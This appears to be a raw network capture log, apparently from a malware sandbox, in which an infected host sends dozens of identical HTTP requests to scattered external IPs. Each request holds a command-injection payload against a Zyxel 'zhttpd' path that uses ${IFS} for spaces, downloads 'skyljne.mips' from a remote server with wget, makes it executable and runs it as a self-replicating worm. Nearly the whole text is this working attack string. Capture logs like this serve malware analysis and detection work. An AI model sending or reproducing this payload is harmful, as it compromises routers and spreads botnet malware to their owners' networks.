                                      Jan 14, 2024 15:50:51.428443909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5655192.168.2.143663297.121.17.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428504944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5656192.168.2.1443868132.120.67.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428560972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5657192.168.2.1443120189.106.28.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428586960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5658192.168.2.1457328162.249.146.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428632021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5659192.168.2.1433316212.96.7.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428661108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5660192.168.2.1433078111.98.131.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428723097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5661192.168.2.143311014.20.170.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428755045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5662192.168.2.1445772171.62.185.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428817034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5663192.168.2.145314813.10.90.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428889036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5664192.168.2.1457438140.136.236.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428932905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5665192.168.2.145811257.184.194.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429030895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5666192.168.2.145190249.206.239.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429075003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5667192.168.2.1456292129.121.162.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429131985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5668192.168.2.1459952207.140.225.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429193974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5669192.168.2.1447484191.190.215.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429228067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5670192.168.2.144747432.147.158.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429286957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5671192.168.2.144773243.232.102.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429330111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5672192.168.2.1460368111.29.93.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429357052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5673192.168.2.1439840167.203.63.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429424047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5674192.168.2.143841887.21.1.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429466963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5675192.168.2.1444416169.168.150.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429518938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5676192.168.2.145261417.50.64.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429562092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5677192.168.2.145584636.49.160.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429599047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5678192.168.2.1457216175.167.236.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429645061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5679192.168.2.143481659.42.21.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429689884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5680192.168.2.1442432111.207.199.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429748058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5681192.168.2.143959487.134.165.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429790020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5682192.168.2.1459824203.197.90.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429828882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5683192.168.2.144446286.234.215.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429877043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5684192.168.2.145934827.11.105.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429961920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5685192.168.2.1458500197.148.163.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.429997921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5686192.168.2.1432904210.91.49.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430027008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5687192.168.2.1460620132.28.113.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430095911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5688192.168.2.1442332219.192.230.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430124044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5689192.168.2.1457058149.187.75.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430165052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5690192.168.2.144091662.4.210.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430252075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5691192.168.2.1458128152.144.218.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430300951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5692192.168.2.1454014150.4.131.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430341005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5693192.168.2.14459564.215.5.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430399895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5694192.168.2.1458864197.71.190.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430458069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5695192.168.2.1437926218.208.44.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430495977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5696192.168.2.1442526123.169.233.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430571079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5697192.168.2.1445362187.53.231.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430603981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5698192.168.2.1450448115.84.32.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430634975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5699192.168.2.1449470151.242.164.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430695057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5700192.168.2.1455390138.172.42.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430741072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5701192.168.2.1442342100.35.70.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430778027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5702192.168.2.1441564187.88.201.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430826902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5703192.168.2.1447250135.60.74.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430871010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5704192.168.2.1446678222.118.224.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430932045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5705192.168.2.1455352189.189.152.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.430985928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5706192.168.2.1450428159.155.195.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431037903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5707192.168.2.1454258201.70.127.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431096077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5708192.168.2.143923672.6.225.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431149006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5709192.168.2.1438908169.11.33.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431199074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5710192.168.2.145076652.91.98.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431253910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5711192.168.2.1437118217.4.154.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431301117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5712192.168.2.144329473.185.45.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431350946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5713192.168.2.1441012163.143.193.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431412935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5714192.168.2.1436070136.209.19.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431436062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5715192.168.2.1454186134.40.126.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431509018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5716192.168.2.1452010170.63.161.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.431566000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5717192.168.2.145203674.164.119.99443
                                      TimestampBytes transferredDirectionData
